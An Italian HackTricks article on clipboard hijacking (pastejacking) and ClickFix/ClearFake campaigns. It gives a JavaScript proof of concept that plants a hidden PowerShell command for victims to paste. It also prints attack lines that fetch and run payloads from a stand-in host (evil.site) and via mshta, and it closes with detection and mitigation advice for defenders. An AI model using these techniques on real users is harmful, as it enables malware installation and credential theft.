Attacchi di Clipboard Hijacking (Pastejacking)
Reading time: 5 minutes
tip
Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)
Impara e pratica il hacking Azure:
HackTricks Training Azure Red Team Expert (AzRTE)
Supporta HackTricks
- Controlla i piani di abbonamento!
- Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
- Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos github.
"Non incollare mai nulla che non hai copiato tu stesso." – consiglio vecchio ma ancora valido
Panoramica
Il clipboard hijacking – noto anche come pastejacking – sfrutta il fatto che gli utenti copiano e incollano routine comandi senza ispezionarli. Una pagina web malevola (o qualsiasi contesto capace di eseguire JavaScript come un'applicazione Electron o Desktop) inserisce programmaticamente testo controllato dall'attaccante negli appunti di sistema. Le vittime sono incoraggiate, normalmente da istruzioni di ingegneria sociale accuratamente elaborate, a premere Win + R (finestra Esegui), Win + X (Accesso rapido / PowerShell), o aprire un terminale e incollare il contenuto degli appunti, eseguendo immediatamente comandi arbitrari.
Poiché nessun file viene scaricato e nessun allegato viene aperto, la tecnica elude la maggior parte dei controlli di sicurezza delle e-mail e dei contenuti web che monitorano allegati, macro o esecuzione diretta di comandi. L'attacco è quindi popolare nelle campagne di phishing che distribuiscono famiglie di malware di consumo come NetSupport RAT, Latrodectus loader o Lumma Stealer.
Prova di Concetto in JavaScript
<!-- Any user interaction (click) is enough to grant clipboard write permission in modern browsers -->
<button id="fix" onclick="copyPayload()">Fix the error</button>
<script>
function copyPayload() {
const payload = `powershell -nop -w hidden -enc <BASE64-PS1>`; // hidden PowerShell one-liner
navigator.clipboard.writeText(payload)
.then(() => alert('Now press Win+R , paste and hit Enter to fix the problem.'));
}
</script>
Le campagne più vecchie utilizzavano document.execCommand('copy')
, quelle più recenti si basano sull'Clipboard API asincrona (navigator.clipboard.writeText
).
Il Flusso ClickFix / ClearFake
- L'utente visita un sito con errori di battitura o compromesso (ad es.
docusign.sa[.]com
) - Il JavaScript ClearFake iniettato chiama un helper
unsecuredCopyToClipboard()
che memorizza silenziosamente una riga di comando PowerShell codificata in Base64 negli appunti. - Le istruzioni HTML dicono alla vittima di: “Premere Win + R, incollare il comando e premere Invio per risolvere il problema.”
powershell.exe
viene eseguito, scaricando un archivio che contiene un eseguibile legittimo più un DLL malevolo (classico sideloading di DLL).- Il loader decripta fasi aggiuntive, inietta shellcode e installa persistenza (ad es. attività pianificata) – eseguendo infine NetSupport RAT / Latrodectus / Lumma Stealer.
Esempio di Catena NetSupport RAT
powershell -nop -w hidden -enc <Base64>
# ↓ Decodes to:
Invoke-WebRequest -Uri https://evil.site/f.zip -OutFile %TEMP%\f.zip ;
Expand-Archive %TEMP%\f.zip -DestinationPath %TEMP%\f ;
%TEMP%\f\jp2launcher.exe # Sideloads msvcp140.dll
jp2launcher.exe
(Java WebStart legittimo) cerca nella sua directorymsvcp140.dll
.- Il DLL malevolo risolve dinamicamente le API con GetProcAddress, scarica due binari (
data_3.bin
,data_4.bin
) tramite curl.exe, li decripta usando una chiave XOR rotante"https://google.com/"
, inietta il codice shell finale e decomprime client32.exe (NetSupport RAT) inC:\ProgramData\SecurityCheck_v1\
.
Latrodectus Loader
powershell -nop -enc <Base64> # Cloud Identificator: 2031
- Scarica
la.txt
con curl.exe - Esegue il downloader JScript all'interno di cscript.exe
- Recupera un payload MSI → deposita
libcef.dll
accanto a un'applicazione firmata → sideloading DLL → shellcode → Latrodectus.
Lumma Stealer tramite MSHTA
mshta https://iplogger.co/xxxx =+\\xxx
La chiamata mshta avvia uno script PowerShell nascosto che recupera PartyContinued.exe
, estrae Boat.pst
(CAB), ricostruisce AutoIt3.exe
tramite extrac32
e concatenazione di file e infine esegue uno script .a3x
che esfiltra le credenziali del browser a sumeriavgv.digital
.
Rilevamento e Caccia
I blue team possono combinare il monitoraggio degli appunti, la creazione di processi e la telemetria del registro per individuare l'abuso del pastejacking:
- Registro di Windows:
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
mantiene una cronologia dei comandi Win + R – cerca voci insolite in Base64 / offuscate. - ID Evento di Sicurezza 4688 (Creazione Processo) dove
ParentImage
==explorer.exe
eNewProcessName
in {powershell.exe
,wscript.exe
,mshta.exe
,curl.exe
,cmd.exe
}. - ID Evento 4663 per la creazione di file sotto
%LocalAppData%\Microsoft\Windows\WinX\
o cartelle temporanee subito prima dell'evento 4688 sospetto. - Sensori degli appunti EDR (se presenti) – correlare
Clipboard Write
seguito immediatamente da un nuovo processo PowerShell.
Mitigazioni
- Indurimento del browser – disabilitare l'accesso in scrittura agli appunti (
dom.events.asyncClipboard.clipboardItem
ecc.) o richiedere un gesto dell'utente. - Consapevolezza della sicurezza – insegnare agli utenti a digitare comandi sensibili o incollarli prima in un editor di testo.
- Modalità Linguaggio Constraining di PowerShell / Politica di Esecuzione + Controllo delle Applicazioni per bloccare one-liner arbitrari.
- Controlli di rete – bloccare le richieste in uscita verso domini noti per pastejacking e malware C2.
Trucchi Correlati
- Discord Invite Hijacking spesso abusa dello stesso approccio ClickFix dopo aver attirato gli utenti in un server malevolo:
Riferimenti
tip
Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)
Impara e pratica il hacking Azure:
HackTricks Training Azure Red Team Expert (AzRTE)
Supporta HackTricks
- Controlla i piani di abbonamento!
- Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
- Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos github.